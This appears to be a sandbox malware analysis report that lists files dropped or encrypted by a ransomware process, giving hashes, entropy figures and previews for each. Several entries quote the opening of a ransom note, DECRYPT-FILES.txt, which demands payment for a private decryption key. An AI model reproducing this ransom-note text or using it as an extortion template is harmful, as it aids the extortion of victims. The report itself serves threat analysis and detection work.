Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Default\NTUSER.DAT.LOG1 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	1056
Entropy (8bit):	7.802440866822057
Encrypted:	false
MD5:	5460D1759A5C9F41A7C7F28AB089A501
SHA1:	F81C813EEAB2CE3D0413C06E4DF1C760F2785819
SHA-256:	39BCE8602F31B170D322C4C1E281A73F68226914940FC464CC4D98542F8C1539
SHA-512:	B1BD66533312EA79416D747FBDB5991D4672BDC6AB9EDF3314262138508E202F3D9FDBC38634251C48C7D37C76ECE676BC155B3ED6EDAA13A016C6E0AF814A8E
Malicious:	false
Reputation:	low
Preview:	.KN1.$.V.g...."%.(..3B.,...d.=.........Wc.....>...,...P..s.).FMU....`R.X..#....I$E..........[S....TC.....5....]..m.Dux.%.=..u. zZ.$..R..;{.q...._h8^.'I%%r...e.U.oZ\W.$-...<.v.g..rM.Y...."..VN.<..K......b...v..T..&..&].!...."......M.5.'.......o....f.af...n..(...wWE}.. ....'}...!>.....h..`.6.]....`/........05..Fl..c..$.<._...by......5W..vv.8Ps..y..h.D5o\n&.q..K.D.'q8.......2...e.@......J.f#&q@.o%.\..,.......Kn.x...RK.[.fZ.X...P7.OTp..^0{..:..6<K..A...t{.J3N.C.JQ.<..wT..7..HZ. .!..j..5'...O~.....f.af../.E.I.......?..:...W.oZ.M..9.s..{"I.....{.=.V.6.8....xF..G..vgdrA...u.p.z.... /P.....]..?I.......]..].5......_.07s)@n.`.....Eaf..`.z.....3..K\...0..u..J......?..........7l.e-..<.\|..@...dW.(....Z..1~.g...\|.. [O..6....Nf......A..bz-.9F..p........f.afqXx.]x.KYwtB..?..d....p..g..E.~...T..T].7E.P.IT...k....=.......$`C..Z..N..Z..Qh.0.Mj...9.r..]H.Y.#\.l.-..\}(..v ...(.Y...3..m.4..\|T..L......~..o..P...?...S.\..L.NT....6d.xu.J.>yt.?}..~....I=.....Ns

C:\Users\Default\Saved Games\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	64316
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	F34B7EDF1CCE9814DB579A1309515E57
SHA1:	0416006332156890BBCF834E204F78605B476531
SHA-256:	CA92983C40594E46CA05D995B3EE843400A982A565F51057DD8FA38A819A65D7
SHA-512:	A8C35249056B7961BCE06E6BD16510C6D6230D74A7D98FF288E22996B8A067416C56A9D6A31529D94E56766A84F609AB0845CDCB400679A66B4BA8989C24FD79
Malicious:	false
Reputation:	low
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Public\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	82692
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	EDEDDB925FEE940E43132F0C682881A9
SHA1:	12D5862A2235926D7EA5A81ED7B951CFF9C6D1BB
SHA-256:	62C6E45F0323C1185ADB0460CC57ADE0F2E261E944157E1A43EA951D416E6E87
SHA-512:	13C9F7E402676BE8713C6938E9B44A0A746C84A5ADB9A8544B096FA4C95ED2EE37F90C46CFBA2CE7C40C64CD8443816A210C654470E8CDD74F55A6EC6F4ED966
Malicious:	false
Reputation:	low
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Public\Libraries\RecordedTV.library-ms Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	264
Entropy (8bit):	7.127907365511703
Encrypted:	false
MD5:	CB03A5494648D90264B7B8DAE55963B9
SHA1:	F2EED4A306012994B7EF1CE2A8193DC503F02CDF
SHA-256:	6F06487E5EB552BBC65593DA2D6E27999CE051F41E23B494BD068DCD41E64268
SHA-512:	CDD279C972D31BB94EEFCD8EC015376A08F519E506191E52F69958171071A7D7959EACF7CB556D86CDBC5241AB5828803AA4F65919C78EB2A9C1CDFD79BD7698
Malicious:	false
Reputation:	low
Preview:	^.....=.}EO..]3ss. .D\|6...r......Q.}..:.]./eJ....s..uU......+...C..\..C....b..f..y/".t.....X...<..R..1.....M......Zs.. {.v^.n....E>..lF....v...y.r.....?.....y..U........!..j?..a.Ua9..b...Y..~.~...Y..n.%K..M.(E=.x...:=8\|.l%....'r.d.."f....F....f.af

C:\Users\Public\Music\Sample Music\AlbumArt_{5FA05D35-A682-4AF6-96F7-0773E42D4D16}_Large.jpg Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.580240086650566
Encrypted:	false
MD5:	0357646F613BF6A8D4E99FEC0BD6A9A2
SHA1:	084086139540F5F4D72587B3A68CE256DB91B0DB
SHA-256:	7B524C3D3833C5B6224A54EB5299CA536E3F080A60070E7FAFE9276415A5B39C
SHA-512:	7B53E6EB6D6EA756EF341AEB133F34017F3A54813781C663D54FBC4050C3833B88C40A5125FF927C7D64910D105F5C04854F60F197E213B7065D1D6FC8C38D6C
Malicious:	false
Reputation:	low
Preview:	........s.F/.T^D..M.A...+.{q]..d..f.....v...}....y......r..2..po....0.#.B.6.v?.S.w...P.K....h.R...X.....p.(G/n.U7..D/..!.$[n........JFC....9........T.J..{_-..xQMB.^...FJja$z9.S2.........U......nlu$n...:...yu!.......SMg)<..t..'....j.Py..Z.$..i{.k.....f.af..Dn..G....%e.:hX....`.v.....AD...Q.N.6,..a.(.0\|.P.?%...b?.k........ .@.(........z..}...8.]...B...F..F!D...._.N/.[.I..8...@...K{<@I...w.G.{.y.........).U...x)..\|....Q.Y..Q4.........m.U.Y..X .S.Y...$g.....[.9....?{}.#.Rxce2.f..r..\.4>Vc.:b........>....f.af

C:\Users\Public\Music\Sample Music\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Reputation:	low
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Public\Music\Sample Music\Kalimba.mp3 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	8414713
Entropy (8bit):	7.999977742767815
Encrypted:	true
MD5:	80E8132B71772DC1190317E808CA6E40
SHA1:	6DCDC3BCD3213F50174351829034C6E120FCDE1F
SHA-256:	678AEA055B2223E235C6549563FAD69439E42EA74A2E45ACD7BB518EC84EBED2
SHA-512:	AC4772DFE63CC31C58CE30CD4548031274B225A5523785489F5AC385977C9A223F8AB204AA2A2E87AE5853D2E5BEA9B0CD12827F82FF9DAEEB6416948614DC54
Malicious:	false
Reputation:	low
Preview:	.#l..V5.....d...[...5\|..a.g..O.?.0.[-o..a.\.5 ..F.PvE...@H.^..?\=..=...<.6`..A...aKO..........;a0.......G..k.V>?....._..ckW...Rr._...}<....a.$m.<zR....T.;..}........P...Q...X.4...-n.c..f.]P.Sq...4.y.....-J..gU..e.Jaa..Q.....x...0..o......@.C..+..J=.B..m,.$..y..!...H%..d....[..H.=.JH..r.....O........$;..W>..d]...fz...u...W>6.Xy.Vr..8.V...4.H...=....?M~}uN....of.......[.RF...=.ll....ppr.n..a. ....5.-c.7% ........h}........I.CBe_....pX..fvL9o...2".'.dW.Q..y:u=b..%..gQ.a.......{.w..<w.uT;..eA'..N...1.I....s..4..b.l\|-.....P.!f..evG.e...(....;..N.....j.o.~..p..n.DW+.w^rC<\|nw..#z{ ...7W~"w..../...x.'..,...Uq..........W.....yL.r....?6..............j.Z....7.c2?..a......kvS.fQ...s.!M......0.B.i.e......K..n....T..~.8...h..wT.w..."....XR....w../5........q.V.Th...d.O0.x.6X...7...d~....(....=Vv55...2..!....%?.....=-6e..Ad...q...t.........1.<;...!g{..N.l..E/_.H.>XjT.H..&.O....k;Z'.u..:.xsI.9n.{t..G.J....m`_..\|.C&...Z..:....!....05.O..lgv....B.`m.

C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	528
Entropy (8bit):	7.54336380826606
Encrypted:	false
MD5:	709986487689D5E140C35ECE8420324C
SHA1:	2D75C87A1E8A68BEBC6CA9134BE2DFB4225744B1
SHA-256:	90F972A0B8D6AC420D4B12DE3B7FACA7668FEBFB1005FD07B48E3E9999ADE072
SHA-512:	F8295CE78D572BEF798942AF71529AF2B71F1B39930C80482A4178ACF9B6A8EFCFB09121F68658BF199D27F039648A8F6537825F9516F0B843CC13A5025A527C
Malicious:	false
Preview:	..+.....a....:nz....{..)."..H.W......y..&...>T1u0...gs.....5_wL..p....`.....K......s.==...E.....P..[....._...y...J.d.B.kl&\.R...kpd...Q:..&8R..m..f...f.@.bCMDZ.[.P&..\.JOm g..L.`..1.k..[....3@y.P.`..B..{..._{.%.O.YF..M..Hd$ty...2g;...bV..!.....f.af.....Th[..z6&.uYjY.C^.#.E.b.o.^.$GV.....] %;$.&JI5..&.f_b....:... q.g.\..-..4..-j......s}7..K+.1...$...!:.....Il...cx/......G.e.S. f.F:1..l4....&^.+e.........$.B.e.o.E.....ZN.zt.....').,.P......9n..Q\...,........h....[Ce._..3\|Q.)-.!.9. (.^....F@!"....f.af

C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	2112
Entropy (8bit):	7.882042115426346
Encrypted:	false
MD5:	48F49E544864D86D1D1EEA7F88A20123
SHA1:	28E29CDBB62BCC76CA33BE63674BAB5022DC12E1
SHA-256:	4D873F2E0FD0188BEEEEB1BAD833D28C755DED7944F4C5DA7EEC9BA1382D4F27
SHA-512:	26370CA5CA80F6E8C4899E0D4C084CAB547EC93E4CB9FF3F58533DF4E66CF877D1B1D8DEE63023D029213F2DC6988BE6C04D61D8AF73095F3D241EB5D3275EB9
Malicious:	false
Preview:	'].@.H.S=}..p.p...&..n.8.SKA..\.\|5.......W?J...g...f:.B@.I...a9u+<.....m....I...Iq......&..h....w....V...&t"..)a...Q...I.}.m.Es..X.....6..."...n...9..4.>..%H....UJ.....D..#ig:h.5!U.....J.....l..=Z.."...$..M#j:..'E.xE..Pa..\\.u..r.<.0^S..me..q....f.afUw.l2......j~=..O..M....Q......c.T...!..@.d.."+.m.......8.....u........l.b(..C....55.u_....r<..=..(..\......Xoc.s-..u]...UI.........E.........X....y..4.E9z?..1.qa....v<.`\|...v........<I....S..:Y[.F.=h..JAN..p.S..?..ol..b.Zq..`)F..G.....G.v....f.af..q....n. ........hE...1..Q..K1.@.{bW...NSO.~..9..,..X#.V+.!._.....d.......i.#....f..Y.`-..1.9L...)p;.9...v9....... ....z..$.C....v.0..j.......m....W.G....Z..R..L..JA..^ylg../yJ....%..}k`.W.Uu...B7..g....TR...M.D^........KR.-U]+..k.$...Mb..r.x.....f.af&S......r.l...._..8H..+..q...`.gg..7.Q...>y.....`.<#............&.a...u5.<.D+....W....>......K.\...#D...Cx.;....2...]v......C.^{....{....".% ta.U....._..i....-...0....Q#q.;..4.;.-...:....D...S.).#

C:\Users\Public\Pictures\Sample Pictures\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Public\Recorded TV\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	18376
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	17C90D15AE0F70CEB0500DC1677C0638
SHA1:	0F645ECE404416F3152689E94539178C658E583F
SHA-256:	7160B9035F4E47A92C4608C45541FB42D07FAD13BB8F4EC07B466DE7694BC11C
SHA-512:	719BC7E235B7901B2D28485A9D9396BF0F787DF34DD667CD7A84F63F8048EF12EBB5EDF2AD5775320B54C1E2515F131359C049AE2509EE510774DE84F03C4008
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Public\Recorded TV\Sample Media\win7_scenic-demoshort_raw.wtv Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	9699592
Entropy (8bit):	7.999979108522225
Encrypted:	true
MD5:	03245EC52020C1075145445019B02480
SHA1:	51985AF08C423A71A64DE19BF3F34C124873A992
SHA-256:	B5B6A0C93245B93CCA49C142983CFB4C486DA6BD3F2D25BC6FDE3E090678637E
SHA-512:	565B26C5451EA8901920265E47CCA867E08AEEF03D896B1DD049E58B3012697C085569BA1D17FC26708D0408C00ECE3BA1D18A91470CB93FBFE27F4C1CCAE6CE
Malicious:	false
Preview:	@{.dF\|^Z..).......6.g...:..X.:".b.......J}.....].9_4..R).....O%,._.}x......#.-......).....y...~..o1C........c?_.B.In.....~...l..{1...N.,..&...Q0....{..K....A..>)&...0...hMj.^......Z....{..Xq^._.g..PY?.M.^.....2...w>..V8F...d..b 4.E.v.md..\|/...r...A..N..n..D...-[....3...v.u.....~C....3\|1..=..m....SZ....<....U.R.X...;.,.56[.P.0..\.`ZfS.T.gr........[.8.<;.S.v......U..... ......n^...u.b.....iC.L.P...Z.....q...... w.".]b..JD....1.....Ru.A.:.&L0....Wt.....s...p.>....W.N.mg.....a.l.......tx...m.P.z...`Fe..}"...#."@I2.0u%.........a...&K.....a..p..!+..Us3..0T.^...&.. .BJu.C.2.D.......Y.#..)...p.5.T..g..-.m;.s..D..u.@`._........v;.....c....h..N.".?..%qg...P.sy.k....=.E..<..q.............3r.tMjCMzg]#.@ 2../$.0./.. %..^..iI......$.$p...?.$.O.BW.L.`l.9.<.H'....Yr..0..j...]..].R..<..G........8R\|.g..p...D..w'.%1.H.....M...........,)S.....'.ns...G.}..9...gp7...(.Z...wo..\..}jYNY...}79.Yl..)...:/.l...J.....WE...*{.QwndO.n>..Z..6.yx.}......i\|..

C:\Users\Public\Videos\Sample Videos\DECRYPT-FILES.txt Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	Little-endian UTF-16 Unicode text, with very long lines, with CRLF, CR line terminators
Size (bytes):	9188
Entropy (8bit):	3.9460708234104853
Encrypted:	false
MD5:	84CD17B8C3938B35EA1D9BA70F63B0AB
SHA1:	3B93E6732C28AB4B2146F6F5ECADA5F60E34E2E7
SHA-256:	C5ED184BE6BB2E16ED313A1EDEF999BACFC344AD560B5BE904565979DC7B920E
SHA-512:	7394E097FBDE00E86857C0BCB02AC16BB9EA09DF9BCB506B36B24557C27D3CCC207CD8B9E1879FF4672AF76B7FD2DD4BA143E9052009DEB85DA9DD723D07CFCC
Malicious:	false
Preview:	..A.t.t.e.n.t.i.o.n.!.........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .W.h.a.t. .h.a.p.p.e.n.e.d.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........A.l.l. .y.o.u.r. .f.i.l.e.s.,. .d.o.c.u.m.e.n.t.s.,. .p.h.o.t.o.s.,. .d.a.t.a.b.a.s.e.s.,. .a.n.d. .o.t.h.e.r. .i.m.p.o.r.t.a.n.t. .d.a.t.a. .a.r.e. .s.a.f.e.l.y. .e.n.c.r.y.p.t.e.d. .w.i.t.h. .r.e.l.i.a.b.l.e. .a.l.g.o.r.i.t.h.m.s.......Y.o.u. .c.a.n.n.o.t. .a.c.c.e.s.s. .t.h.e. .f.i.l.e.s. .r.i.g.h.t. .n.o.w... .B.u.t. .d.o. .n.o.t. .w.o.r.r.y... .Y.o.u. .h.a.v.e. .a. .c.h.a.n.c.e.!. .I.t. .i.s. .e.a.s.y. .t.o. .r.e.c.o.v.e.r. .i.n. .a. .f.e.w. .s.t.e.p.s...........-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.....\|. .H.o.w. .t.o. .g.e.t. .m.y. .f.i.l.e.s. .b.a.c.k.?.....-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.........T.h.e. .o.n.l.y. .m.e.t.h.o.d. .t.o. .r.e.s.t.o.r.e. .y.o.u.r. .f.i.l.e.s. .i.s. .t.o. .p.u.r.c.h.a.s.e. .a. .u.n.i.q.u.e. .f.o.r. .y.o.u. .p.r.i.v.a.t.e. .

C:\Users\Public\Videos\Sample Videos\Wildlife.wmv Download File
Process:	C:\Windows\Temp\wupd12.14.tmp
File Type:	data
Size (bytes):	26246290
Entropy (8bit):	7.999992913948074
Encrypted:	true
MD5:	504BA69DABDF22B6EF0FA05EA6E594F2
SHA1:	368D0F48F87CB79B1BA59A4C83BE4D093FE2C6FE
SHA-256:	6FE86A04537B39F9847B7CE06E5A4AC6C5069999ABC81F303E987143B3D93AF5
SHA-512:	AD9194D248395AB8813AB77EC86826AC6967ECE3D798AB62652AAD5CD5BCA8E85DCAA1085F05DA5F8B135E211693FF61A1B4E0721CC5341C66E15E5138EC3960
Malicious:	false
Preview:	..Ju^:4t_..1....wS.(..K,.d..G.+....Q...G......\|......F4.Q.lw.........vE...`. ......(.G.Y.....3".#.)+.. .M...a.4.2.....r........]..+H)K..h..0K.u).$b.c...../...%.t...v.8...=.>.z.Pr.h\..p...;..Z..$.\|..-......m`2Cg.C.././.",,....U..3...<..............,...C...g..mynB..:...S.(.P<...4.U.._`.w......7.&..S_..n...z3..(..z...4..uH...Pc.s........<.......x...].....U...0.'...0..L........<V.K/78&....\5.Eum.......H...^...T.wPD8.(.ZN(.k`..=.........J..M.....h.../z.tM..H..er.R.\..U....r.K ...XN8I.../w.S.;.7).....K...`4...0;....=.c...H..p....,...F.....{...e...E....6.....-@.W...<...9..`.J=....(..G.I-...i.z}._`M..3\....)..... ..8T\|Y.\|..G..d..q..>......Ks.UE[x....p.+...>i.M...8FT...-..........=.'.M......Ye....fP......g!..............[{.3.. 